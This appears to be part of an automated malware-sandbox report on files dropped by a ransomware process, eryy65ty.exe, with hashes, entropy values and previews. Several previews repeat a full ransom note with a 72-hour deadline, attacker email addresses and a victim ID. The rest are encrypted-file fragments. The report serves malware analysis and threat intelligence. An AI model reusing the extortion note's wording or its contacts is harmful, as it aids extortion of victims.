                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):266
                                                                                                                                            Entropy (8bit):7.181960019998209
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:6fO/8Y3O8aE0Je/atrZt8tRxCFxEli0FH65aFSQK3wn:6m/937x0JZutRYs965agdwn
                                                                                                                                            MD5:5A36FB4590578945D07C1920E20C65AF
                                                                                                                                            SHA1:BE691C95BF50074D525C3A61F872552547F55A06
                                                                                                                                            SHA-256:34DE9352ED799DBB4A6F18C90B15E852CAD01B96162A4CFFD7C1B0C7DEE0C55E
                                                                                                                                            SHA-512:2338CD9784BBEDECD2E187E58BB191369ACEE1225DA2FFF3CC725BFEBFC0D5AD116F57632C0F24621427905CA1DA0319AF43A723B3FA1F3C5103FE7BA0F3FE1F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.K].azQ..=.T.....Xe/...v r...#.C.P:v.F.8......zx+(|. Ib......+NV.}.......#.'......-;....E.|z..Fb...T..;[..3N...f...@..<.U.....Bn.5...=2_....T.&2f...%.;.s:g....2....#..3..}.z....dr.5..G{..#9....<..._so..<..d.i..._....M.........<...odLv..Z..P.L..9'.0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):266
                                                                                                                                            Entropy (8bit):7.175848542910089
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:JDew6kqzMhpBPVY8fVcASoqvXKYGrTmRF8VSbPFqhAPjn:JDTWM5mFASoGq46KPY4n
                                                                                                                                            MD5:169E6E88F680C8440B496094C967BD9E
                                                                                                                                            SHA1:1BE7585DDE822D0CCCFF3FFEB71680A68E8D785D
                                                                                                                                            SHA-256:52A45B35F0BD3A50F40FACB3206488D009C29EA982B9170693CC6D64BA0E9290
                                                                                                                                            SHA-512:D683468483C9149F39CB5A82592BA815A68F40D532AECA26598CD641A1AD51A3D74BD17BA644137D9A1F90AB1CA759FAD7106AE6BF67C4F09D7CF5FBBF9528EB
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:`S...BG.%.%L..f.:$.j.^pj(A.)..%..A=C.mj.9F[.....j.<)g..a%~@b/Q...+.$2].i.zr....c..pM..Y....Ku....rL.,3.Hw....8.6O.........G..G...q..}-..e...[.)...J.T..$...gw.........2..^....0.2Q..7."[.E<..Mx.T..OI....2..F...`.5.......hv.jQA..N..q.4Y.n........9.0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):266
                                                                                                                                            Entropy (8bit):7.212132319054459
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:hQVCkr7g0YHWYGBYT+NjqyO6YywlvZOtUcWH0NqI/bbbwpgW5UlmTn:hQro0YHfo8y+ewlnnH0RbbiUlmTn
                                                                                                                                            MD5:607AECCC3C500B836A00D0E2956A56CC
                                                                                                                                            SHA1:4782B7F64F3525B1C4F1ACA75E0DE76C6EE08CD0
                                                                                                                                            SHA-256:B866D352411B889162CD5ED7A4B06080D4D89A98BB6500CCC5F6F65E0156E841
                                                                                                                                            SHA-512:558BD37B2D5786426E39365516F13DA5572A4FDB881510AE4100EE2CA627E5CEDC2088B22CAB2C29EC3C4ED525913375EDF3384D5FA04E6B99033ABE09C59B74
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.......N..C.....M..x^.)......>.m..bG. v^.......T.=.\...R.(... 8$Z.p.H......R.[.iR..........FPU5.H.~....*......0.4....A......&.{f.h..."e..z)d...3N...'..eO$.W...^n0..W........*..v.....cG...j..&...d%.P.[.v.S.._NQ2. 7_.O....l.Jv..hL(.......0..O..0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1125
                                                                                                                                            Entropy (8bit):7.835020202225414
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:S0CpN2L2LDbhL9jKqv7QumhuP32VHzRibRH:90XmqvsjhO3UTRiN
                                                                                                                                            MD5:3D7E42E8911503F7FB2E1EB0C1CB814A
                                                                                                                                            SHA1:FD59F90D849562CD40EC4D0C8D647A163AD6F266
                                                                                                                                            SHA-256:7330FBD7B56A19D34937934C44DCAE32C0236FA725F5047E5600DCAC8AD3D730
                                                                                                                                            SHA-512:C0978ABC8FECBA3F41C0FB6A205E4C4BECBA61541E790D9A01687BDF94CC2A9BCC257430920B9363855CF06281322621AEC97F3E9053ECD2A2472B40988B9B00
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.X.......['W5.PT...m..1....Aq+..`.....,....T...3..q5LH..wn.h..f....0.....5..~.!.U......YA.)......6.F....([..A..U&.P."b..*..../ ...S...5.P...u.a.I...U._@.&..A.Gb!.l.ov.....0xie.fAK.0c.&.r._....>.N7...~Y..,G....{..~E..........A...a.Gl?.d....5.!G..]7.:m...F.6<",W.5 ..tP.r.~l_...."P4..................lf....$.n..8.lR._.J>.v=.e\..!..K...j.^". #zS._.u.Y.&U.......u..G.h.(.z......8.b.P`?.r...A...?.^......+bY.N.....yj.u.Zp.....)*>..m..\W...l..2#..%...?..........@3....m...3\&..^q>....i...........O.........k.....|...+:5)....#<..b.7>...........A^..G. A.......L.wD..z...'.v.d..........wo%..y.7e...a..}#....0.T..y..&Q).........f.ix.|.I."X..P.BUD.f.fj.<V.`C>..V.9.....=5C...&...y#...d.EC....Xz.E...e.9.........z..r..+(@.......2@....%aI..........'.#.3...T.qyz3=........L%C.Wt.K.P.V..}{?*a......Go......u...8..U...escription>H@...5.d..P...pxE........*.q...p?`C.+.....eZ8'}....5.;....A..6.u.... ..3H5q....4.@s!0f..B.`y...=..........*.`.".....a(..*+/...Ab..7.....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1125
                                                                                                                                            Entropy (8bit):7.835020202225414
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:S0CpN2L2LDbhL9jKqv7QumhuP32VHzRibRH:90XmqvsjhO3UTRiN
                                                                                                                                            MD5:3D7E42E8911503F7FB2E1EB0C1CB814A
                                                                                                                                            SHA1:FD59F90D849562CD40EC4D0C8D647A163AD6F266
                                                                                                                                            SHA-256:7330FBD7B56A19D34937934C44DCAE32C0236FA725F5047E5600DCAC8AD3D730
                                                                                                                                            SHA-512:C0978ABC8FECBA3F41C0FB6A205E4C4BECBA61541E790D9A01687BDF94CC2A9BCC257430920B9363855CF06281322621AEC97F3E9053ECD2A2472B40988B9B00
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.X.......['W5.PT...m..1....Aq+..`.....,....T...3..q5LH..wn.h..f....0.....5..~.!.U......YA.)......6.F....([..A..U&.P."b..*..../ ...S...5.P...u.a.I...U._@.&..A.Gb!.l.ov.....0xie.fAK.0c.&.r._....>.N7...~Y..,G....{..~E..........A...a.Gl?.d....5.!G..]7.:m...F.6<",W.5 ..tP.r.~l_...."P4..................lf....$.n..8.lR._.J>.v=.e\..!..K...j.^". #zS._.u.Y.&U.......u..G.h.(.z......8.b.P`?.r...A...?.^......+bY.N.....yj.u.Zp.....)*>..m..\W...l..2#..%...?..........@3....m...3\&..^q>....i...........O.........k.....|...+:5)....#<..b.7>...........A^..G. A.......L.wD..z...'.v.d..........wo%..y.7e...a..}#....0.T..y..&Q).........f.ix.|.I."X..P.BUD.f.fj.<V.`C>..V.9.....=5C...&...y#...d.EC....Xz.E...e.9.........z..r..+(@.......2@....%aI..........'.#.3...T.qyz3=........L%C.Wt.K.P.V..}{?*a......Go......u...8..U...escription>H@...5.d..P...pxE........*.q...p?`C.+.....eZ8'}....5.;....A..6.u.... ..3H5q....4.@s!0f..B.`y...=..........*.`.".....a(..*+/...Ab..7.....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:OpenPGP Secret Key
                                                                                                                                            Category:modified
                                                                                                                                            Size (bytes):292
                                                                                                                                            Entropy (8bit):7.180641137754196
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:S1NMI0tPUT1mGxyxiifTwKfkM/I97X8KMo1usDaj0rxutYr6n:GyI0Y1KiifTN/I1X9fDhxMYr6n
                                                                                                                                            MD5:77D2D289653A6B19E390F01B518CEC87
                                                                                                                                            SHA1:5E1764B1603D3B6925D1DE70C79A29A9E6278FF3
                                                                                                                                            SHA-256:B53230AA289F7A136E96E6245BA4ADD647D4DDABF6B195C2390C0F2893C95BEC
                                                                                                                                            SHA-512:2E19185BBAD11C48432AD5BAA2FE11D5178FD6053B9ACFB259B2009B5FC5A64DC20F5222423B2266C11AA0F5AC947C653BD14356E4E020DF43A787E03B6980B8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...[.O....O8F..T............8;y..b.aC.G .v.9.P..e...*n49i)P........N..*.&H..T.C&x}.."_.7.nog...dA........q........G..L..6.!B=NG.3.....0.LX...P.P.H..H.."3S.....Y....*.._.....2.../ba"..t..K.,.g.k.Z.X..q.y........}e..v...R.r..<......_..d...z.=..s...M.....W...Dj..9....w%0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):266
                                                                                                                                            Entropy (8bit):7.198318138450298
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:2lKEQNo7GkJ3HNzePaWoSrtGLmy54Ak7Sj9eADLhFuHn:2lQNo7G2BePaGtEmy5Y7SQADbuHn
                                                                                                                                            MD5:86CC86E3E1F76AE86790F78E2BF77B0E
                                                                                                                                            SHA1:3AE947FB38434099918B0B86D7A2AF0C7BEB61CB
                                                                                                                                            SHA-256:9375DCBC94F594A2FABF55BBA004E752566ABAB454473B138C007EF4B46CC2C6
                                                                                                                                            SHA-512:7012A762709A52AA7DC327C247FD42BD6C233A965E18F04C8364F1E02AEBE2B7813D8A0EE9BFD6AFAAC7FE6FC453E2530AAF5B5971911AE7006C9B0D18E53864
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:E.XW.X"C..g........3..>.Q...4....7?..H...k.^.7.......p#Av..?8.S ..Ra..B.s...%..r.L.f....Lm&._2..Pi].......w.w.6....+H..gx.....B.Kn.O.....C..=`.K..Z.].a..K.......7.3j_..z........q.@.....:r5d:V@0as1S.Y$.M..8..|.....:..l..k"...iaT..5S$..(.*..=0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):266
                                                                                                                                            Entropy (8bit):7.234541717485634
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:jMk/CDFRjxuw3X9lz0hVTH+5IylxSSs2VBtMah3BB0Lon:4kqJuw3X9RdIsSeXMahH0Lon
                                                                                                                                            MD5:33C556387EEDEF2169B153719C661DA7
                                                                                                                                            SHA1:9368B7A333BF929F311BA5F1E34BF801918CB9C6
                                                                                                                                            SHA-256:39681F0ED5CC04654156DEE82066CC08C0A1E1AD3A96475D04B7ADAA8BA65C48
                                                                                                                                            SHA-512:68BB0A81ED11B059D393EA6C5B3C886BC80E6400F9EE9D785569EE2F3C15BDF96D0A3F95B778D9F4179E3DC28E1DC1B1B4F4AB2E6B06E6FACE3D8715006E71C9
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:".......m~.d.A..i'4.9....=>.&.s WP......G.....=Ge...-T...#I.........[pX.....!.~&...k.....&h3qp....Z...5......{..J..#.A.......-......D...1.......v..m...S..[..#.gY.5~.....:.\R...m.c..Ns......Nz........+.{3u.._z`|Ru..HnR...b........"....7..0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):266
                                                                                                                                            Entropy (8bit):7.162034362305927
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:wBqvsXb7I8Y6Ig559D84l6CMzAKw7HjcBfskSn:wBOqI8JIg5598CH/PkSn
                                                                                                                                            MD5:BB5D70A92608B1E2CBF82AB75E1FA161
                                                                                                                                            SHA1:FA713C72B8B44D6C937FBE3454B01AAAC19F8585
                                                                                                                                            SHA-256:7B7738D9DF22B59C2C731EC9271C500DBC633292429A683BB9C19DEB7169DAC0
                                                                                                                                            SHA-512:FCE7B77DE9F0EF1B728DFB955E11B9BB6FE2662A787E71D15091F5E8AA4AB2FD8956CE01DE4A38D4DBDA557B1D498C16EDED0FF6D33E39CE83CE1D0A13124A38
                                                                                                                                            Malicious:false
